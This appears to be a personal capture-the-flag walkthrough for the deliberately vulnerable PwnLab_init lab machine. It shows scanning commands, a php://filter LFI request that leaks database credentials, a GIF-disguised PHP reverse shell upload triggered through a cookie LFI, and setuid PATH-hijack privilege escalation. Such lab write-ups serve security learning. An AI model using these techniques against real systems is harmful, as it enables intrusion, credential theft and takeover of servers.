Pwnlab_init

Tools:

  • netdiscover
  • Nmap
  • DirBuster
  • Burp

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.50.0/24

192.168.50.131 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.50.131 -p-

port 80 is opening.

use nikto to scan

nikto -h 192.168.50.131

use dirbuster to get all dirs and files

check the page:

use sqlmap

sqlmap -u "http://192.168.50.131" --forms --batch --crawl=10 --level=5 --risk=3 --random-agent --dbms=MySQL

Nothing.

Check the page souce code,

It seems there is a local file inclusion in page parmeter, based on LFI

curl http://192.168.50.131/?page=php://filter/convert.base64-encode/resource=config

get config.php' base64 encoded content

echo PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+ | base64 --decode

get mysql username/password

connect mysql database:

mysql -h 192.168.50.131 -u root -pH4u%QJ_H99

show databases:

mysql> show databases;

1
2
3

mysql> show tables;
mysql> use Users;
mysql> select * from users;

these passwords are base64 encoded

1
2
3

kent | JWzXuBJJNy
mike | SIfdsTEn6I
kane | iSv5Ym2GRo

login as kane

try to upload webshell, failed. only accept image.

in order to find out which file extension do i need

I will get upload.php code

curl http://192.168.50.131/?page=php://filter/convert.base64-encode/resource=upload

decode the content

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
  <body>
      <form action='' method='post' enctype='multipart/form-data'>
          <input type='file' name='file' id='file' />
          <input type='submit' name='submit' value='Upload'/>
      </form>
  </body>
</html>
<?php
if(isset($_POST['submit'])) {
  if ($_FILES['file']['error'] <= 0) {
      $filename  = $_FILES['file']['name'];
      $filetype  = $_FILES['file']['type'];
      $uploaddir = 'upload/';
      $file_ext  = strrchr($filename, '.');
      $imageinfo = getimagesize($_FILES['file']['tmp_name']);
      $whitelist = array(".jpg",".jpeg",".gif",".png");

      if (!(in_array($file_ext, $whitelist))) {
          die('Not allowed extension, please upload images only.');
      }

      if(strpos($filetype,'image') === false) {
          die('Error 001');
      }

      if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
          die('Error 002');
      }

      if(substr_count($filetype, '/')>1){
          die('Error 003');
      }

      $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

      if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
          echo "<img src=\"".$uploadfile."\"><br />";
      } else {
          die('Error 4');
      }
  }
}

so image extensions are $whitelist = array(".jpg",".jpeg",".gif",".png");

copy a php reverse shell into a gif file, use burp add GIF

then the php shell is uploaded

now need to find out how to trigger the shell

check index.php

curl http://192.168.50.131/?page=php://filter/convert.base64-encode/resource=index

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
  include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
  if (isset($_GET['page']))
  {
      include($_GET['page'].".php");
  }
  else
  {
      echo "Use this server to upload and share image files inside the intranet";
  }
?>
</center>
</body>
</html>

find out cookie also have LFI.

first verify the LFI

now setup netcat on port 443

get the shell

login in as kane

su kane

find an interesting file msgmike

ls -alh msgmike

its seuid is set.

try to run it

./msgmike

shows cat: /home/mike/msg.txt: No such file or directory

try to escape it

1
2
3
4

export PATH=.:$PATH
echo "/bin/bash" > cat
chmod +x cat
./msgmike

now escape to user mike.

Find another program’s setuid is on

run msg2root

Message for root:

upload setuid.c, compiled.

run msg2root, get root

lfi